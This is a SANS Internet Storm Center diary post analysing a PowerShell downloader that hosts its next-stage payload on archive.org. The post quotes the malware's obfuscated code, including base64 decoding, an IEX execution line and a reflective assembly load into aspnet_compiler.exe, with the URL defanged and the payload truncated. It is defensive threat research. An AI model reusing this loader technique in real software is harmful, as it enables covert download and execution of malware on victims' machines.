Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: SANS Internet Storm Center SANS Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
We will be migrating the site to a new datacenter today. Expect some outages and stale data.

Latest Diaries

Malicious Content Delivered Through archive.org

Published: 2021-07-29
Last Updated: 2021-07-29 07:18:21 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

archive.org[1], also known as the "way back machine" is a very popular Internet site that allows you to travel back in time and browse old versions of a website (like the ISC website[2]). It works like regular search engines and continuously crawls the internet via bots. But there is another way to store content on archive.org: You may create an account and upload some content by yourself.

I found a piece of malicious Powershell that uses archive.org to download the next stage payload. It's score on VT is only 5/58[3] (SHA256:2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:

FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)
{
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing"
  $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
  return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
}
$TYFGYTFFFYTFYTFYTFYT = 'hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt'
$JUANADEARCO = 'JEZWWVRGWVRGWUZZRllGWUZHWT0 ... [removed] ... VFJEVAp9CklFWCB2aXA='
$HBAR = D4FD5C5B9266824C4EEFC83E0C69FD3FAA($JUANADEARCO);
$Run=($HBAR -Join '')|I`E`X

The Base64 data is decoded and contains more Powershell code working like a downloader. It fetches the next payload from archive.org, dumps it on the disk, and executes it with the help of the following technique:

[Reflection.Assembly]::Load($H5).GetType('VBNET.PE').GetMethod('Run').Invoke($null,[object[]] ( 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe',$H1))

Let's put aside the malware (a classic one) and give more focus on the file grabbed from archive.org. If you go one directory above, you'll see a directory listing:

The interesting file is server-lol-123_20210606_meta.xml. It reveals interesting information about the attacker:

<metadata>
<identifier>server-lol-123_20210606</identifier>
<mediatype>texts</mediatype>
<collection>opensource</collection>
<description>Server_lol_123</description>
<scanner>Internet Archive HTML5 Uploader 1.6.4</scanner>
<subject>Server_lol_123</subject>
<title>Server Lol 123</title>
<uploader>moxey68914@revutap.com</uploader>
<collection>community</collection>
<publicdate>2021-06-06 06:52:29</publicdate>
<addeddate>2021-06-06 06:52:29</addeddate>
<curation>
[curator]validator@archive.org[/curator][date]20210606065744[/date][comment]checked for malware[/comment]
</curation>
<identifier-access>http://archive.org/details/server-lol-123_20210606</identifier-access>
<identifier-ark>ark:/13960/t9x17kx37</identifier-ark>
</metadata>

As you can see, this user uploaded a lot of files:

That's the wild Internet today: If you allow users to create an account and upload some data, chances are big that the feature will be (ab)used to host malicious content. Indeed, archive.org is a top domain and is usually not blocked or tagged as malicious.

[1] https://archive.org
[2] https://web.archive.org/web/*/isc.sans.edu
[3] https://www.virustotal.com/gui/file/2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b/details

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

A sextortion e-mail from...IT support?!
Jul 28th 2021
1 day ago by Jan (0 comments)

Apple Patches for CVE-2021-30807
Jul 28th 2021
1 day ago by Yee Ching (0 comments)

Failed Malspam: Recovering The Password
Jul 26th 2021
3 days ago by DidierStevens (0 comments)

Wireshark 3.4.7 Released
Jul 25th 2021
4 days ago by DidierStevens (0 comments)

Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
Jul 24th 2021
4 days ago by Bojan (0 comments)

Agent.Tesla Dropped via a .daa Image and Talking to Telegram
Jul 24th 2021
5 days ago by Xme (0 comments)

Uncovering Shenanigans in an IP Address Block via Hurricane Electric's BGP Toolkit (II)
Jul 23rd 2021
6 days ago by Yee Ching (0 comments)

Lost in the Cloud: Akamai DNS Outage
Jul 22nd 2021
1 week ago by Johannes (0 comments)

View All Diaries →

Latest Discussions

Dshield Sensor
created Jun 8th 2021
1 month ago by Rick (0 replies)

API port data
created Apr 25th 2021
3 months ago by JJ (1 reply)

RSS feed containing non-XML compatible characters
created Apr 14th 2021
3 months ago by Anonymous (1 reply)

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
4 months ago by bas.auer@auerplace.nl (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
5 months ago by astraea (0 replies)

View All Forums →

Latest News

Top Diaries

"Summer of SAM": Microsoft Releases Guidance for CVE-2021-36934
Jul 22nd 2021
1 week ago by Johannes (0 comments)

Securing and Optimizing Networks: Using pfSense Traffic Shaper Limiters to Combat Bufferbloat
Jul 12th 2021
2 weeks ago by Johannes (0 comments)

DIY CD/DVD Destruction - Follow Up
Jul 4th 2021
3 weeks ago by DidierStevens (0 comments)

Maldocs: Protection Passwords
Feb 28th 2021
4 months ago by DidierStevens (0 comments)

An infection from Rig exploit kit
Jun 17th 2019
2 years ago by Brad (0 comments)